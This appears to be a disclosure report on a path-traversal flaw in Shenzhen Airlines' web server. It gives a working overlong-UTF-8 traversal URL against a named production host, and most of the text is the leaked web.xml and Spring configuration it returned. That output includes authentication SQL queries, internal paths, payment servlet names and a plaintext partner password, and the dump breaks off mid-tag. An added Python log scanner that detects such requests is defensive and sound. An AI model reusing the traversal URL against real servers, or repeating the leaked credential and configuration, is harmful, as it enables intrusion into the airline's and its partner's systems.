Shenzhen Airlines: improper character-set parsing in the Java container leads to arbitrary file traversal

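Vulnerability details

Disclosure status:

2016-05-09: Details reported to the vendor; awaiting vendor handling
2016-05-11: Vendor confirmed; details disclosed to the vendor only
2016-05-21: Details disclosed to core white hats and experts in related fields
2016-05-31: Details disclosed to regular white hats
2016-06-10: Details disclosed to trainee white hats
2016-06-25: Details disclosed to the public

Brief description:

Improper character-set parsing in Shenzhen Airlines' Java container leads to arbitrary file traversal

Detailed description:

#1 Vulnerable server

http://miaosha.shenzhenair.com

#2 Vulnerable URL

Code area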
http://miaosha.shenzhenair.com/%c0%ae/WEB-INF/web.xml





Code area
<bean id="uiueGroupBuyingDao" class="com.iss.szair.b2c.uiue.groupBuying.dao.impl.GroupBuyingDaoImpl"/>
<bean id="groupBuyingBiz" class="com.iss.szair.b2c.uiue.groupBuying.bizlogic.impl.UiueGroupBuyingBiz">
<property name="groupBuyingDao">
<ref local="uiueGroupBuyingDao"/>
</property>
</bean>
<!-- ADD BY YUJIA NEB-625 20141117 END -->
<!-- add by li-ji 20141112 NEB-625 air ticket group buying - display start -->
<bean id="IShowPromotionDao" class="com.iss.szair.b2c.groupBuying.dao.impl.ShowPromotionDaoImpl"/>
<bean id="IShowPromotionBiz" class="com.iss.szair.b2c.groupBuying.bizlogic.impl.ShowPromotionBiz">
<property name="showPromotionDao">
<ref local="IShowPromotionDao"/>
</property>
</bean>
<bean id="IShowPromotionUiueDao" class="com.iss.szair.b2c.uiue.groupBuying.dao.impl.ShowPromotionUiueDaoImpl"/>
<bean id="IShowPromotionUiueBiz" class="com.iss.szair.b2c.uiue.groupBuying.bizlogic.impl.ShowPromotionUiueBiz">
<property name="showPromotionUiueDao">
<ref local="IShowPromotionUiueDao"/>
</property>
</bean>
<!-- add by li-ji 20141028 NEB-625 air ticket group buying - display end -->
<bean id="IAuctionPubBiz" class="com.iss.szair.b2c.auction.bizlogic.AuctionPubBiz">
<property name="auctionPubDao">
<ref local="IAuctionPubDao"/>
</property>
</bean>
<bean id="IAuctionPubDao" class="com.iss.szair.b2c.auction.dao.oracle.AuctionPubDaoImpl"></bean>
<bean id="IAuctionRecordBiz" class="com.iss.szair.b2c.auction.bizlogic.AuctionRecordBiz">
<property name="auctionRecordDao">
<ref local="IAuctionRecordDao"/>
</property>
</bean>
<bean id="IAuctionRecordDao" class="com.iss.szair.b2c.auction.dao.oracle.AuctionRecordDaoImpl"></bean>
<!--
==========================add by hlkang for auction==========================
-->
<bean id="authenticationManager" class="org.acegisecurity.providers.ProviderManager">
<property name="providers">
<list>
<!-- <ref local="mybean"/> -->
<ref local="daoAuthenticationProvider"/>
<ref local="anonymousAuthenticationProvider"/>
</list>
</property>
</bean>
<bean id="anonymousProcessingFilter" class="org.acegisecurity.providers.anonymous.AnonymousProcessingFilter">
<property name="key">
<value>foobar</value>
</property>
<property name="userAttribute">
<value>anonymousUser,AUTH_ANONYMOUS</value>
</property>
</bean>
<bean id="daoAuthenticationProvider" class="org.acegisecurity.providers.dao.DaoAuthenticationProvider">
<property name="userDetailsService" ref="jdbcDaoImpl"/>
<property name="userCache">
<ref local="userCache"/>
</property>
<!-- if you do not want encode password -->
<property name="passwordEncoder" ref="passwordEncoder"/>
</bean>
<bean id="passwordEncoder" class="org.acegisecurity.providers.encoding.Md5PasswordEncoder"/>
<bean id="loggerListener" class="org.acegisecurity.event.authentication.LoggerListener"/>
<bean id="jdbcDaoImpl" class="org.acegisecurity.userdetails.jdbc.JdbcDaoImpl">
<property name="dataSource">
<ref bean="dataSource"/>
</property>
<property name="usersByUsernameQuery">
<value>
SELECT user_sAccount, User_sPassword,1 FROM Sys_user WHERE User_sAccount=?
</value>
<!--
<value>SELECT user_sAccount, User_sPassword,User_nIsEnabled FROM Sys_user WHERE User_sAccount=?</value>
-->
</property>
<property name="authoritiesByUsernameQuery">
<value>
select u.User_sAccount,auth.Auth_sName from Sys_AuthRole authrel,Sys_Auth auth,Sys_User u,Sys_OrgRelation rel1,Sys_PostRole rel2 WHERE u.User_sAccount = ? and u.User_sID=rel1.OrRe_sNode and rel1.OrRe_sParentNode=rel2.PoRo_sOrgNodeID and rel2.PoRo_sRoleID= authrel.AURO_SROLEID and auth.Auth_sID = authrel.AURO_SAUTHID
</value>
</property>
</bean>
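
An added example, not part of the original report: `%c0%ae` in the URL above is an overlong two-byte UTF-8 encoding of `.` (U+002E), which a decoder that skips the shortest-form check turns back into a dot. The Python code below models such a decoder next to a strict one and flags request paths in access logs; the function names, the sample log lines and the assumption that the container decodes this way are illustrative and not taken from the vendor's code.

```python
import posixpath
import re
from urllib.parse import unquote_to_bytes

# Directories a servlet container must never serve directly.
PROTECTED_DIRS = {"WEB-INF", "META-INF"}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (documentation IP ranges), not taken from the page.
SAMPLE_LOG = [
    '203.0.113.7 - - [09/May/2016:10:01:02 +0800] "GET /index.jsp HTTP/1.1" 200 5120',
    '203.0.113.7 - - [09/May/2016:10:01:05 +0800] "GET /%c0%ae/WEB-INF/web.xml HTTP/1.1" 200 48211',
    '198.51.100.4 - - [09/May/2016:10:02:11 +0800] "GET /download/%e6%9c%ba%e7%a5%a8.pdf HTTP/1.1" 200 1033',
    '198.51.100.4 - - [09/May/2016:10:02:30 +0800] "GET /WEB-INF/web.xml HTTP/1.1" 404 0',
]


def lenient_utf8_decode(data: bytes) -> str:
    """Model of a non-validating decoder (an assumption about the container):
    it trusts the length bits of the lead byte and never checks that the
    shortest possible encoding was used."""
    out, i = [], 0
    while i < len(data):
        lead = data[i]
        if lead < 0x80:
            extra, cp = 0, lead
        elif lead >> 5 == 0b110:
            extra, cp = 1, lead & 0x1F
        elif lead >> 4 == 0b1110:
            extra, cp = 2, lead & 0x0F
        elif lead >> 3 == 0b11110:
            extra, cp = 3, lead & 0x07
        else:
            extra, cp = -1, 0  # stray continuation byte or invalid lead byte
        tail = data[i + 1:i + 1 + max(extra, 0)]
        if extra < 0 or len(tail) < extra or any(t >> 6 != 0b10 for t in tail):
            out.append("\ufffd")
            i += 1
            continue
        for t in tail:
            cp = (cp << 6) | (t & 0x3F)
        valid_scalar = cp <= 0x10FFFF and not 0xD800 <= cp <= 0xDFFF
        out.append(chr(cp) if valid_scalar else "\ufffd")
        i += 1 + extra
    return "".join(out)


def inspect_path(request_target: str) -> dict:
    """Compare strict and lenient decoding of a request path and report why
    the request should be rejected (empty list means nothing suspicious)."""
    path = request_target.split("?", 1)[0]
    raw = unquote_to_bytes(path)
    try:
        raw.decode("utf-8")  # strict decoder: overlong forms raise
        strict_ok = True
    except UnicodeDecodeError:
        strict_ok = False
    decoded = lenient_utf8_decode(raw)
    normalized = posixpath.normpath(decoded.replace("\\", "/"))
    segments = {s.upper() for s in normalized.split("/") if s}
    reasons = []
    if not strict_ok:
        reasons.append("invalid-or-overlong-utf8")
    if segments & PROTECTED_DIRS:
        reasons.append("protected-directory")
    return {"strict_utf8": strict_ok, "decoded": decoded,
            "normalized": normalized, "reasons": reasons}


def scan_log(lines):
    """Return (request path, reasons) for every log line worth reviewing."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        result = inspect_path(match.group(1))
        if result["reasons"]:
            findings.append((match.group(1), result["reasons"]))
    return findings


if __name__ == "__main__":
    for target, reasons in scan_log(SAMPLE_LOG):
        print(target, "->", ", ".join(reasons))
```

Rejecting any path that fails strict UTF-8 decoding, and applying the protected-directory check only after decoding and normalization, closes the gap between what the access check sees and what the file lookup uses.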

 

Proof of vulnerability:

 

Code area
This XML file does not appear to have any style information associated with it. The document tree is shown below.
<web-app id="WebApp_1154401509359">
<context-param id="ContextParam_1233884491862">
<param-name>contextConfigLocation</param-name>
<param-value>
/WEB-INF/classes/com/iss/config/FrontSpringConfig.xml
</param-value>
</context-param>
<filter id="Filter_1233884491863">
<filter-name>Character Encoding</filter-name>
<filter-class>com.iss.common.CharacterEncodingFilter</filter-class>
<init-param id="InitParam_1233884491863">
<param-name>encoding</param-name>
<param-value>GBK</param-value>
</init-param>
<init-param id="InitParam_1233884491864">
<param-name>ignore</param-name>
<param-value>true</param-value>
</init-param>
</filter>
<filter id="Filter_1233884491864">
<filter-name>B2g Login Manage</filter-name>
<filter-class>com.iss.b2g.common.LoginFilter</filter-class>
<init-param id="InitParam_1233884491865">
<param-name>encoding</param-name>
<param-value>GBK</param-value>
</init-param>
<init-param id="InitParam_1233884491866">
<param-name>ignore</param-name>
<param-value>true</param-value>
</init-param>
</filter>
<filter id="Filter_1233884491865">
<filter-name>B2a Login Manage</filter-name>
<filter-class>com.iss.b2g.common.LoginFilter</filter-class>
<init-param id="InitParam_1233884491867">
<param-name>encoding</param-name>
<param-value>GBK</param-value>
</init-param>
<init-param id="InitParam_1233884491868">
<param-name>ignore</param-name>
<param-value>true</param-value>
</init-param>
</filter>
<filter id="Filter_1379346676944">
<filter-name>ProductExtendFilter</filter-name>
<filter-class>com.iss.common.ProductExtendFilter</filter-class>
</filter>
<!-- add by jinqr 20140326 NEB-BUG316 security vulnerability start -->
<filter id="Filter_1233884491871">
<filter-name>IllegalCharacterFilter</filter-name>
<filter-class>com.iss.common.IllegalCharacterFilter</filter-class>
<init-param id="InitParam_1233884491871">
<param-name>characterParams</param-name>
<param-value>',",<,></param-value>
</init-param>
</filter>
<!-- add by jinqr 20140326 NEB-BUG316 security vulnerability end -->
<filter id="Filter_1379346676945">
<filter-name>AllUrlFilter</filter-name>
<filter-class>com.iss.common.filter.AllUrlFilter</filter-class>
<init-param id="InitParam_1379346676944">
<param-name>includeStrings</param-name>
<param-value>
select ;select%20;script;update ;update%20;delete ;delete%20;iframe;%20and%20
</param-value>
</init-param>
<init-param id="InitParam_1379346676945">
<param-name>redirectPath</param-name>
<param-value>/</param-value>
</init-param>
<init-param id="InitParam_1379346676946">
<param-name>disabletestfilter</param-name>
<param-value>N</param-value>
</init-param>
</filter>
<filter-mapping>
<filter-name>IllegalCharacterFilter</filter-name>
<url-pattern>/regist/userMgr.do</url-pattern>
</filter-mapping>
<filter-mapping id="FilterMapping_1379346676944">
<filter-name>AllUrlFilter</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
<filter-mapping id="FilterMapping_1379346676945">
<filter-name>ProductExtendFilter</filter-name>
<servlet-name>action</servlet-name>
</filter-mapping>
<filter-mapping id="FilterMapping_1379346676946">
<filter-name>ProductExtendFilter</filter-name>
<url-pattern>*.jsp</url-pattern>
</filter-mapping>
<filter-mapping id="FilterMapping_1233884491862">
<filter-name>B2g Login Manage</filter-name>
<url-pattern>/b2g/*</url-pattern>
</filter-mapping>
<filter-mapping id="FilterMapping_1233884491863">
<filter-name>B2a Login Manage</filter-name>
<url-pattern>/b2a/*</url-pattern>
</filter-mapping>
<filter-mapping id="FilterMapping_1233884491864">
<filter-name>Character Encoding</filter-name>
<servlet-name>action</servlet-name>
</filter-mapping>
<filter-mapping id="FilterMapping_1233884491878">
<filter-name>Character Encoding</filter-name>
<url-pattern>*.jsp</url-pattern>
</filter-mapping>
<listener id="Listener_1233884491878">
<listener-class>
org.springframework.web.util.IntrospectorCleanupListener
</listener-class>
</listener>
<listener id="Listener_1233884491879">
<listener-class>
org.springframework.web.context.ContextLoaderListener
</listener-class>
</listener>
<listener id="Listener_1233884491880">
<listener-class>
org.acegisecurity.ui.session.HttpSessionEventPublisher
</listener-class>
</listener>
<listener id="Listener_1233884491881">
<listener-class>com.iss.szair.b2g.account.action.ClientAccountCtrl</listener-class>
</listener>
<servlet id="Servlet_1233884439721">
<servlet-name>action</servlet-name>
<servlet-class>org.apache.struts.action.ActionServlet</servlet-class>
<init-param id="InitParam_1233884491878">
<param-name>config</param-name>
<param-value>
/WEB-INF/struts-config.xml,/WEB-INF/config/struts-config-system.xml ,/WEB-INF/config/example/struts-config-example.xml ,/WEB-INF/config/b2g/account/struts-config-account.xml ,/WEB-INF/config/b2g/advice/struts-config-advice.xml ,/WEB-INF/config/b2g/deposit/struts-config-deposit.xml ,/WEB-INF/config/b2g/query/struts-config-query.xml ,/WEB-INF/config/b2g/teamorder/struts-config-teamorder.xml ,/WEB-INF/config/hr/struts-config-hr.xml ,/WEB-INF/config/wap/struts-config-wap.xml ,/WEB-INF/config/b2a/outuser/struts-config-outuser.xml ,/WEB-INF/config/b2a/bSPReimburse/struts-config-bSPReimburseQ.xml ,/WEB-INF/config/b2a/bulletin/struts-config-bulletin.xml ,/WEB-INF/config/b2a/advice/struts-config-adviceB2a.xml ,/WEB-INF/config/b2a/agentorder/struts-config-agentorder.xml ,/WEB-INF/config/b2a/ticketStstusAlert/struts-config-ticketStstusAlert.xml ,/WEB-INF/config/b2a/Loan/struts-config-loan.xml ,/WEB-INF/config/b2a/pnr/struts-config-pnr.xml ,/WEB-INF/config/b2a/AgentReport/struts-config-agentReport.xml ,/WEB-INF/config/b2a/returnbill/struts-config-returnbill.xml ,/WEB-INF/config/b2a/manageTicket/struts-config-manageTicket.xml ,/WEB-INF/config/universiadeguess/struts-config-guess.xml ,/WEB-INF/config/secondbuy/struts-config-secondbuy.xml ,/WEB-INF/config/universiade/struts-config-universiadePhoto.xml ,/WEB-INF/config/awardsList/struts-config-awardsList.xml
<!--
,/WEB-INF/config/ticketBookingFlow/struts-config-ticketBookingFlow.xml
-->
,/WEB-INF/config/coupon/struts-config-coupon.xml ,/WEB-INF/config/ddds/struts-config-ddds.xml ,/WEB-INF/config/voucher/struts-config-voucher.xml ,/WEB-INF/config/payinterface/struts-config-payinterface.xml ,/WEB-INF/config/activity/struts-config-activity.xml ,/WEB-INF/config/questionnaire/struts-config-questionnaire.xml ,/WEB-INF/config/checkIn/struts-config-checkIn.xml ,/WEB-INF/config/uiue/struts-config-uiue.xml ,/WEB-INF/config/internationalBooking/struts-config-internationalBooking.xml ,/WEB-INF/config/internationalBooking/struts-config-test-internationalBooking.xml ,/WEB-INF/config/checksession/struts-config-checksession.xml ,/WEB-INF/config/userManager/struts-config-um.xml ,/WEB-INF/config/groupBuying/struts-config-groupBuying.xml
</param-value>
</init-param>
<init-param id="InitParam_1233884491879">
<param-name>debug</param-name>
<param-value>2</param-value>
</init-param>
<init-param id="InitParam_1233884491880">
<param-name>detail</param-name>
<param-value>2</param-value>
</init-param>
<load-on-startup>2</load-on-startup>
</servlet>
<servlet id="Servlet_1233884439722">
<servlet-name>InitLog</servlet-name>
<servlet-class>com.iss.system.log.InitLog4j</servlet-class>
<init-param id="InitParam_1233884491881">
<param-name>log4j-config</param-name>
<param-value>\WEB-INF\log4j.properties</param-value>
</init-param>
<init-param id="InitParam_1233884491882">
<param-name>config-relative</param-name>
<param-value>true</param-value>
</init-param>
<init-param id="InitParam_1233884491883">
<param-name>property-relative</param-name>
<param-value>true</param-value>
</init-param>
<load-on-startup>4</load-on-startup>
</servlet>
<servlet id="Servlet_1233884439723">
<servlet-name>ContextServlet</servlet-name>
<servlet-class>com.iss.config.ContextServlet</servlet-class>
<init-param id="InitParam_1233884491884">
<param-name>DataSource</param-name>
<param-value>jdbc/shem</param-value>
</init-param>
<init-param id="InitParam_1233884491885">
<param-name>FareDataSource</param-name>
<param-value>jdbc/fare</param-value>
</init-param>
<init-param id="InitParam_1233894491885">
<param-name>CacheDataSource</param-name>
<param-value>jdbc/cache</param-value>
</init-param>
<init-param id="InitParam_1233884491886">
<param-name>GlobalMessageResource</param-name>
<param-value>resources.GlobalMessageResources</param-value>
</init-param>
<init-param id="InitParam_1233884491887">
<param-name>ROOT_PATH</param-name>
<param-value/>
</init-param>
<init-param id="InitParam_1233884491888">
<param-name>appServer</param-name>
<param-value>websphere</param-value>
</init-param>
<!-- START 2013/12/21 ADD BY LI JIAN international ticket printer added -->
<init-param id="InitParam_6455257">
<param-name>IBE_INTER_PRINTER_NO</param-name>
<param-value>3</param-value>
</init-param>
<!-- END 2013/12/21 ADD BY LI JIAN international ticket printer added -->
<init-param id="InitParam_645525701">
<param-name>IBE_INTER_PRINTER_NO_1</param-name>
<param-value>2</param-value>
</init-param>
<init-param id="InitParam_645525702">
<param-name>IBE_INTER_PRINTER_NO_2</param-name>
<param-value>9</param-value>
</init-param>
<init-param id="InitParam_645525703">
<param-name>IBE_INTER_PRINTER_NO_3</param-name>
<param-value>10</param-value>
</init-param>
<init-param id="InitParam_645525704">
<param-name>IBE_INTER_PRINTER_NO_4</param-name>
<param-value>13</param-value>
</init-param>
<!-- START 2014/4/10 ADD BY ZHANGJ payment platform ticket printer added -->
<init-param id="InitParam_6455258">
<param-name>IBE_PAYMENTPLAT_PRINTER_NO_1</param-name>
<param-value>12</param-value>
</init-param>
<init-param id="InitParam_6455259">
<param-name>IBE_PAYMENTPLAT_PRINTER_NO_2</param-name>
<param-value>12</param-value>
</init-param>
<!-- END 2014/4/10 ADD BY ZHANGJ payment platform ticket printer added -->
<init-param id="InitParam_1233884491889">
<param-name>IBE_B2C_PRINTER_NO</param-name>
<param-value>1</param-value>
</init-param>
<init-param id="InitParam_1233884491890">
<param-name>IBE_B2G_PRINTER_NO</param-name>
<param-value>3</param-value>
</init-param>
<init-param id="InitParam_1233884491891">
<param-name>IBE_B2A_PRINTER_NO</param-name>
<param-value>9</param-value>
</init-param>
<init-param id="InitParam_1233884491892">
<param-name>IBE_SYS_PRINTER_NO</param-name>
<param-value>1</param-value>
</init-param>
<init-param id="InitParam_1233884491893">
<param-name>IBE_B2C_REFOUND_PRINTER_NO</param-name>
<param-value>1</param-value>
</init-param>
<init-param id="InitParam_1233884491905">
<param-name>IBE_B2C_REFOUND_WF1_PRINTER_NO</param-name>
<param-value>4</param-value>
</init-param>
<init-param id="InitParam_1233884491906">
<param-name>IBE_B2C_REFOUND_WF2_PRINTER_NO</param-name>
<param-value>5</param-value>
</init-param>
<init-param id="InitParam_1233884491894">
<param-name>IBE_B2A_REFOUND_PRINTER_NO</param-name>
<param-value>1</param-value>
</init-param>
<init-param id="InitParam_1233884491895">
<param-name>IBE_B2G_REFOUND_PRINTER_NO</param-name>
<param-value>1</param-value>
</init-param>
<init-param id="InitParam_1233884491896">
<param-name>IBE_SYS_REFOUND_PRINTER_NO</param-name>
<param-value>1</param-value>
</init-param>
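<!--
add by bidi 2014-10-22 round-robin ticket issuing across ticket printers; the ticket printers of each platform must be confirmed before release
After grouping all ticket printers by platform, separate them with an ASCII semicolon (;) and fill them into each param-value.
-->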
<init-param id="InitParam_1233837519069">
<param-name>IBE_B2C_PRINTER_NOS</param-name>
<param-value>1;6</param-value>
</init-param>
<init-param id="InitParam_1233837519070">
<param-name>IBE_PASY_PRINTER_NOS</param-name>
<param-value>7;11;12;14;15;16;17;18;19;20;21;22;23</param-value>
</init-param>
<init-param id="InitParam_1233837519071">
<param-name>IBE_INTER_PRINTER_NOS</param-name>
<param-value>2</param-value>
</init-param>
<!-- end by bidi -->
<init-param id="InitParam_1233884491897">
<param-name>IBE_CONFIG</param-name>
<param-value>PRODUCTION</param-value>
</init-param>
<init-param id="InitParam_1233884491898">
<param-name>DOWNLOAD_DIR</param-name>
<param-value>
D:\IBM\WebSphere\AppServer\installedApps\WWW-SVR\szair.ear\szair.war\download\
</param-value>
</init-param>
<init-param id="InitParam_1233884491899">
<param-name>HTTP_DIR</param-name>
<param-value>/download/</param-value>
</init-param>
<init-param id="InitParam_1233884491903">
<param-name>EPSILON_URL</param-name>
<param-value>
http://custom-apac.epsiloninteractive.com/shenzhenair/raf/RAF_friend.php
</param-value>
</init-param>
<init-param id="InitParam_1233884491904">
<param-name>EPSILON_PASSWORD</param-name>
<param-value>p=toYq4DJ8</param-value>
</init-param>
<init-param id="InitParam_1233884491907">
<param-name>MAX_SENDCODETIMES</param-name>
<param-value>3</param-value>
</init-param>
<!-- ADD by yu.yu 20140325 NEB-283 single sign-on between B2C and Dianfen START -->
<init-param id="InitParam_1233884491908">
<param-name>DIANFEN_URL</param-name>
<param-value>http://ecfan.shenzhenair.com</param-value>
</init-param>
<!-- ADD by yu.yu 20140325 NEB-283 single sign-on between B2C and Dianfen END -->
<!-- add by li-ji 20141022 NEB-626 Easy Come Easy Go start -->
<!-- 1: Easy Come Easy Go product enabled; 0: Easy Come Easy Go product disabled -->
<init-param id="InitParam_1233884491999">
<param-name>EASY_COME_EASY_GO_FLAG</param-name>
<param-value>1</param-value>
</init-param>
<!-- add by li-ji 20141022 NEB-626 Easy Come Easy Go end -->
<!-- Easy Come Easy Go cabin class configuration -->
<init-param id="InitParam_1233884491988">
<param-name>YLYW_TCLASS_WF</param-name>
<param-value>S</param-value>
</init-param>
<!-- add by jinqr 20141208 NEB-659 linkage P-cabin product start -->
<init-param id="InitParam_1234884491999">
<param-name>LINKAGE_P_START</param-name>
<param-value>2015-03-09</param-value>
</init-param>
<init-param id="InitParam_1234884491968">
<param-name>LINKAGE_P_END</param-name>
<param-value>2015-12-31</param-value>
</init-param>
<init-param id="InitParam_1233884491978">
<param-name>LINKAGE_P_DISCOUNT_RANGE</param-name>
<param-value>30</param-value>
</init-param>
<!-- add by jinqr 20141208 NEB-659 linkage P-cabin product end -->
<init-param id="InitParam_1233884491991">
<param-name>SPECIAL_LINKAGE_P_START</param-name>
<param-value>2015-07-08</param-value>
</init-param>
<init-param id="InitParam_1233884491992">
<param-name>SPECIAL_LINKAGE_P_END</param-name>
<param-value>2015-08-24</param-value>
</init-param>
<init-param id="InitParam_1233884491993">
<param-name>SPECIAL_LINKAGE_P_DISCOUNT_RANGE</param-name>
<param-value>50</param-value>
</init-param>
<init-param id="InitParam_12338123491994">
<param-name>ADVANCE_BOOKING_DAYS</param-name>
<param-value>3</param-value>
</init-param>
<load-on-startup>1</load-on-startup>
</servlet>
<servlet id="Servlet_1233884439724">
<servlet-name>BankPayServlet</servlet-name>
<servlet-class>com.iss.szair.bank.BankPayServlet</servlet-class>
</servlet>
<servlet id="Servlet_1233884439725">
<servlet-name>WapBankPayServlet</servlet-name>
<servlet-class>com.iss.szair.bank.WapBankPayServlet</servlet-class>
</servlet>
<servlet id="Servlet_1233884439752">
<servlet-name>EPosPayServlet</servlet-name>
<servlet-class>com.iss.szair.bank.yeepay.epos.EPosPayServlet</servlet-class>
</servlet>
<servlet id="Servlet_1233884439726">
<servlet-name>ABCB2CServlet</servlet-name>
<servlet-class>com.iss.szair.bank.abc.ABCB2CServlet</servlet-class>
</servlet>
<servlet id="Servlet_1233884439727">
<servlet-name>AliPayB2CServlet</servlet-name>
<servlet-class>com.iss.szair.bank.alipay.AliPayB2CServlet</servlet-class>
</servlet>
<servlet id="Servlet_1243957839381">
<servlet-name>AliPayB2CServlet1</servlet-name>
<servlet-class>com.iss.szair.bank.alipay.AliPayB2CServlet1</servlet-class>
</servlet>
<servlet id="Servlet_1243957839382">
<servlet-name>GZUNIONB2CServlet</servlet-name>
<servlet-class>com.iss.szair.bank.gzunion.GZUNIONB2CServlet</servlet-class>
</servlet>
<servlet id="Servlet_1282032627900">
<servlet-name>QuickMoneyB2CServlet</servlet-name>
<servlet-class>com.iss.szair.bank.quickmpay.QuickMoneyB2CServlet</servlet-class>
</servlet>
<servlet id="Servlet_1282032627999">
<servlet-name>QuickMoneyCCServlet</servlet-name>
<servlet-class>
com.iss.szair.bank.quickmpay.cc.QuickMoneyCCServlet
</servlet-class>
</servlet>
<!-- add by xingjg NEB-80-social check-in start -->
<servlet id="Servlet_1282032627980">
<servlet-name>PlatformLoginServlet</servlet-name>
<servlet-class>com.iss.szair.b2c.checkin.platform.LoginServlet</servlet-class>
</servlet>
<!-- add by xingjg NEB-80-social check-in end -->
<servlet id="Servlet_1337167838755">
<servlet-name>WyzxB2CServlet</servlet-name>
<servlet-class>com.iss.szair.bank.wyzxen.WyzxB2CServlet</servlet-class>
</servlet>
<servlet id="Servlet_1282032627901">
<servlet-name>BOCOMB2CServlet</servlet-name>
<servlet-class>com.iss.szair.bank.bocom.BOCOMB2CServlet</servlet-class>
</servlet>
<servlet id="Servlet_1233884439728">
<servlet-name>BCB2CServlet</servlet-name>
<servlet-class>com.iss.szair.bank.bc.BCB2CServlet</servlet-class>
</servlet>
<servlet id="Servlet_1233884439729">
<servlet-name>CCBB2CServlet</servlet-name>
<servlet-class>com.iss.szair.bank.ccb.CCBB2CServlet</servlet-class>
</servlet>
<servlet id="Servlet_1233884439730">
<servlet-name>CCBWapB2CServlet</servlet-name>
<servlet-class>com.iss.szair.bank.ccb.CCBWapB2CServlet</servlet-class>
</servlet>
<servlet id="Servlet_1233884439731">
<servlet-name>CMBB2CServlet</servlet-name>
<servlet-class>com.iss.szair.bank.cmb.CMBB2CServlet</servlet-class>
</servlet>
<servlet id="Servlet_1233884439732">
<servlet-name>CHINAPNRB2CServlet</servlet-name>
<servlet-class>com.iss.szair.bank.chinapnr.CHINAPNRB2CServlet</servlet-class>
</servlet>
<servlet id="Servlet_1233884439733">
<servlet-name>CHINAPNRB2CServlet1</servlet-name>
<servlet-class>com.iss.szair.bank.chinapnr.CHINAPNRB2CServlet1</servlet-class>
</servlet>
<servlet id="Servlet_1233884439734">
<servlet-name>CHINAPNRMASB2CServlet</servlet-name>
<servlet-class>com.iss.szair.bank.chinapnr.CHINAPNRMASB2CServlet</servlet-class>
</servlet>
<servlet id="Servlet_1233884439735">
<servlet-name>CHINAPNRMASB2CRefundServlet</servlet-name>
<servlet-class>
com.iss.szair.bank.chinapnr.CHINAPNRMASB2CRefundServlet
</servlet-class>
</servlet>
<servlet id="Servlet_1233884439736">
<servlet-name>ICBCB2CServlet</servlet-name>
<servlet-class>com.iss.szair.bank.icbc.ICBCB2CServlet</servlet-class>
</servlet>
<servlet id="Servlet_1233884439737">
<servlet-name>SDBB2CServlet</servlet-name>
<servlet-class>com.iss.szair.bank.sdb.SDBB2CServlet</servlet-class>
</servlet>
<servlet id="Servlet_1233884439738">
<servlet-name>SZSHPDB2CServlet</servlet-name>
<servlet-class>com.iss.szair.bank.spdb.SZSHPDB2CServlet</servlet-class>
</servlet>
<servlet id="Servlet_1233884439739">
<servlet-name>SZUnionServlet</servlet-name>
<servlet-class>com.iss.szair.bank.szunion.SZUNIONB2CServlet</servlet-class>
</servlet>
<servlet id="Servlet_1233884439740">
<servlet-name>YeePay2CServlet</servlet-name>
<servlet-class>com.iss.szair.bank.yeepay.YeePay2CServlet</servlet-class>
</servlet>
<servlet id="Servlet_1233884439741">
<servlet-name>TenPayB2CServlet</servlet-name>
<servlet-class>com.iss.szair.bank.tenpay.TenPayB2CServlet</servlet-class>
</servlet>
<servlet id="Servlet_1233884439742">
<servlet-name>SelectCityServlet</servlet-name>
<servlet-class>com.iss.szair.common.servlet.SelectCityServlet</servlet-class>
</servlet>
<servlet id="Servlet_1233884439743">
<servlet-name>CrmScoreServlet</servlet-name>
<servlet-class>
com.oaking.shem.webservice.kingclub.CrmScoreServlet
</servlet-class>
</servlet>
<servlet id="Servlet_1233884439744">
<servlet-name>ChineseWordServlet</servlet-name>
<servlet-class>com.iss.szair.common.servlet.ChineseWordServlet</servlet-class>
</servlet>
<servlet id="Servlet_1233884439745">
<servlet-name>AxisServlet</servlet-name>
<display-name>Apache-Axis Servlet</display-name>
<servlet-class>org.apache.axis.transport.http.AxisServlet</servlet-class>
</servlet>
<servlet id="Servlet_1233884439746">
<servlet-name>AdminServlet</servlet-name>
<display-name>Axis Admin Servlet</display-name>
<servlet-class>org.apache.axis.transport.http.AdminServlet</servlet-class>
<load-on-startup>100</load-on-startup>
</servlet>
<servlet id="Servlet_1233884439747">
<servlet-name>SOAPMonitorService</servlet-name>
<display-name>SOAPMonitorService</display-name>
<servlet-class>org.apache.axis.monitor.SOAPMonitorService</servlet-class>
<init-param id="InitParam_1233884491900">
<param-name>SOAPMonitorPort</param-name>
<param-value>5001</param-value>
</init-param>
<load-on-startup>100</load-on-startup>
</servlet>
<servlet id="Servlet_1233884439748">
<servlet-name>Barbecue</servlet-name>
<servlet-class>net.sourceforge.barbecue.BarcodeServlet</servlet-class>
<load-on-startup>1</load-on-startup>
</servlet>
<servlet id="Servlet_1233884439749">
<servlet-name>AjaxServlet</servlet-name>
<servlet-class>com.shenzhenair.shem.gift.checkCardServlet</servlet-class>
</servlet>
<servlet id="Servlet_1233884439750">
<servlet-name>dwr-invoker</servlet-name>
<display-name>DWR Servlet</display-name>
<servlet-class>uk.ltd.getahead.dwr.DWRServlet</servlet-class>
<init-param id="InitParam_1233884491901">
<param-name>debug</param-name>
<param-value>false</param-value>
</init-param>
<init-param id="InitParam_1233884491902">
<param-name>crossDomainSessionSecurity</param-name>
<param-value>false</param-value>
</init-param>
<load-on-startup>10</load-on-startup>
</servlet>
<servlet id="Servlet_1233884439751">
<servlet-name>SearchEngineServlet</servlet-name>
<display-name>Search Engine Servlet</display-name>
<servlet-class>com.szair.common.SearchEngineServlet</servlet-class>
</servlet>
<servlet id="Servlet_1233884439753">
<servlet-name>BarcodeServlet</servlet-name>
<servlet-class>org.krysalis.barcode4j.servlet.BarcodeServlet</servlet-class>
</servlet>
<servlet id="Servlet_9082011072202">
<servlet-name>FindPasswordServlet</servlet-name>
<servlet-class>
com.iss.szair.b2c.regist.servlet.FindPasswordServlet
</servlet-class>
</servlet>
<servlet id="Servlet_9282011072202">
<servlet-name>ValidateUserServlet</servlet-name>
<servlet-class>
com.iss.szair.b2c.regist.servlet.ValidateUserServlet
</servlet-class>
</servlet>
<servlet id="Servlet_1233884439754">
<servlet-name>BarcodeErrorServlet</servlet-name>
<servlet-class>org.krysalis.barcode4j.webapp.BarcodeErrorServlet</servlet-class>
</servlet>
<servlet id="Servlet_1282032627902">
<servlet-name>TejiaMailBookServlet</servlet-name>
<servlet-class>com.szair.common.TejiaMailBookServlet</servlet-class>
</servlet>
<servlet id="Servlet_image">
